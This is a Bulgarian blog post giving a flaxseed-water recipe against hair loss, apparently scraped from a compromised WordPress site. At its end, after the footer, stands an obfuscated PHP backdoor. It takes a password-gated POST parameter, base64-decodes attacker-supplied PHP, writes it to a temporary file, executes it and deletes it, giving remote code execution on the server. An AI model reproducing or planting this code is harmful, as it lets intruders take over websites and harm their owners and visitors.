Рецепта с ленено семе срещу косопад | Косопад

Рецепта с ленено семе срещу косопад

kosa-leneno-seme

Ежедневно косата ни е изложена на много негативни фактори, които я правят по- слаба, изсушават я и й причиняват видими увреждания. Затова всеки ден трябва да й осигуряваме необходимите хранителни вещества и подходящи грижи, за да е блестяща и здрава.

Лененото семе й сред природните средства, които могат да осигурят на косата богата комбинация от ценни вещества: омега- 3 мазнини, витамини Е и В.

Витамин Е действа като антиоксидант, който неутрализира вредното влияние на околната среда и стимулира регенерирането на косата. Витамин В е полезен за нервната система и кръвообращението, а също и за кожата и косата, като я подхранва, заздравява и й придава блясък.

КАК ДА ИЗПОЛЗВАМЕ ЛЕНЕНОТО СЕМЕ В ГРИЖАТА ЗА КОСАТА

Има различни начини, но един от най –популярните е водата от ленено семе, която хидратира, предпазва от косопад и подпомага растежа. Тази рецепта може да се превърне в най- добрия ни съюзник за здрава коса. Освен това, я фиксира и предпазва от статичното електричество.

leneno-seme

Приготвянето на вода от ленено е лесно. Необходима е:
– 1 лъжица ленено семе
– 1 литър вода
– 3 лъжици лимонов сок.

Слагаме водата да се вари в касерола, докато заври. Добавяме лененото семе и оставяме на огъня за 2 минути или повече, докато водата се сгъсти. Когато е готово, оставяме да изстине и прецеждаме. Отстраняваме семето и към водата добавяме 3 лъжици лимонов сок.

Измиваме косата, както обикновено. Когато започнем да я решем, взимаме малко от водата с ръце и нанасяме върху скалпа. А след това и към върховете. По този начин подхранваме косата и я предпазваме от косопад. За да се справим със статичното електричество или с къдравата коса, отново нанасяме по същия начин.

Друг начин на използване е като нанасяме върху скалпа всяка вечер. По този начин правим косата здрава, предпазваме от косопад и подсилваме растежа.

За да запазим продукта, слагаме лимоновия сок и го държим в хладилника. Срокът му на годност е 2 седмици. Затова не е добре да се приготвя голяма количество от него.

29. май 2017 11:07:53 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}